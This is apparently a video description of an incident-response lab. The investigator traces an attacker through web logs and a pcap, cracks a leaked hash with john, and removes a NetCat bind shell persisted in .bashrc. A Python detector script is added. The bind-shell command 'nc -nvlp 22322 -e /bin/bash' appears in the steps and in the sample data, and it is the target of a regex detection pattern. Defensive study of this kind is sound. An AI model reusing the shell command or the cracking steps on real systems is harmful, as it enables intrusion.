Project 65 - Investigating A Cyber Attack In Progress!
Author: Daryl Shows His Work
Uploaded: 2025-11-05
Views: 11
Description:
Steps Taken/Commands Used (in the order that they appear in the video):
1. Open a browser and go to http://hdmovies.ca
2. Open a terminal and sudo cat /var/log/apache2/access.log.1 (to check the web traffic recorded in the Apache access log)
3. Looking through the log entries, we see either movie downloads or requests for web resources, except for one entry which appears to be the download of a file called "dailytraffic.pcapng" (a packet capture file) from IP address 172.20.0.7
4. wget http://hdmovies.ca/dailytraffic.pcapng (to download the file to my home directory)
5. sudo wireshark dailytraffic.pcapng (to open the packet capture file in Wireshark)
6. Apply the display filter ftp-data (to show only the packets belonging to the data channel of this FTP session)
7. Right-click the first packet and follow the TCP stream to see the plaintext username (admin) and a password hash
8. Click the "Save as" button at the bottom and name the file "leaked_hash.txt"
9. Open a new terminal and john leaked_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt (to try to crack the password hash)
10. john --show leaked_hash.txt (to display the cracked password)
11. service --status-all (to check all running services for potential entry points)
12. Let's check whether any SSH sessions have been established: cat /var/log/lastlog (to display the latest established connections)
13. It looks like our same friend at 172.20.0.7 who downloaded the pcap file is also the one who successfully established an SSH connection to one of our internal hosts
14. ps -aux (to display all running processes and look for suspicious ones that may indicate a backdoor on the host)
15. It looks like we have a NetCat listener set up on port 22322 that executes /bin/bash (allowing the attacker to interact with a bash session on our end)
16. ack 'nc -nvlp 22322 -e /bin/bash' (to use ack to search the system files for the script or process that starts NetCat)
17. nano .bashrc (to read the file and remove the "nc" command)
18. Save and Exit
19. kill 2201 (to kill the running NetCat process)
20. sudo netstat -tulpn (to verify that it is gone)
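The log review (steps 2-3) and the persistence hunt (steps 15-17) can be scripted so the same triage is repeatable on the next incident. The following Python script is an added example, not code from the video or its author: it parses constructed Apache combined-format log lines and flags successful downloads of file types a movie site would not normally serve, then scans a constructed .bashrc for lines that hand a shell to a NetCat listener. The log format, the extension allowlist and all sample data are assumptions made for the example.

```python
import re

# Regex for the Apache "combined" log format (assumption: the site logs in the default format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# File types a movie site would legitimately serve (assumed allowlist for this example).
EXPECTED_EXT = {".html", ".css", ".js", ".png", ".jpg", ".ico", ".mp4", ".mkv", ".avi"}

# Startup-file lines that wire a shell to a listener, e.g. "nc -nvlp 22322 -e /bin/bash".
LISTENER_RE = re.compile(r'\b(nc|ncat|netcat)\b[^|;&\n]*\s-e\s+/bin/(ba|da)?sh\b')

# Constructed sample access.log lines modelled on the scenario; not data from the video.
SAMPLE_LOG = """\
172.20.0.5 - - [04/Nov/2025:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
172.20.0.5 - - [04/Nov/2025:10:01:13 +0000] "GET /css/site.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
172.20.0.9 - - [04/Nov/2025:10:02:40 +0000] "GET /movies/thriller.mp4 HTTP/1.1" 200 734003200 "-" "Mozilla/5.0"
172.20.0.7 - - [04/Nov/2025:10:05:03 +0000] "GET /dailytraffic.pcapng HTTP/1.1" 200 2097152 "-" "Wget/1.21"
172.20.0.7 - - [04/Nov/2025:10:05:30 +0000] "GET /backup.zip HTTP/1.1" 404 196 "-" "Wget/1.21"
172.20.0.9 - - [04/Nov/2025:10:07:55 +0000] "GET /movies/comedy.mkv HTTP/1.1" 206 120000000 "-" "Mozilla/5.0"
"""

# Constructed sample ~/.bashrc carrying the persistence line from step 15; not the real file.
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
nc -nvlp 22322 -e /bin/bash &
"""


def parse_access_log(text):
    """Parse log text into dicts; lines that do not match the format are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, text.splitlines()) if m]


def unexpected_downloads(entries):
    """Return (ip, path) for successful GETs of files whose extension is outside the allowlist."""
    hits = []
    for e in entries:
        if e["method"] != "GET" or not e["status"].startswith("2"):
            continue  # only completed (2xx) downloads matter here; failed probes are a separate signal
        path = e["path"].split("?", 1)[0]
        name = path.rsplit("/", 1)[-1]
        if "." not in name:
            continue  # directory index or extension-less route, not a file download
        ext = "." + name.rsplit(".", 1)[-1].lower()
        if ext not in EXPECTED_EXT:
            hits.append((e["ip"], path))
    return hits


def find_listener_lines(text):
    """Return (line_no, line) for startup-file lines that start a shell-backed listener."""
    return [(n, line.strip())
            for n, line in enumerate(text.splitlines(), 1)
            if LISTENER_RE.search(line)]


def main():
    for ip, path in unexpected_downloads(parse_access_log(SAMPLE_LOG)):
        print(f"[access.log] unusual download {path} by {ip}")
    for n, line in find_listener_lines(SAMPLE_BASHRC):
        print(f"[.bashrc] line {n}: {line}")


if __name__ == "__main__":
    main()
```

Running it reports the pcap download by 172.20.0.7 and the .bashrc line that starts the listener. The same find_listener_lines() check can be pointed at /etc/profile, /etc/bash.bashrc, ~/.profile and cron entries, which are other common places a listener gets persisted; step 20's netstat then confirms nothing is listening on 22322 once the line is removed and the process killed.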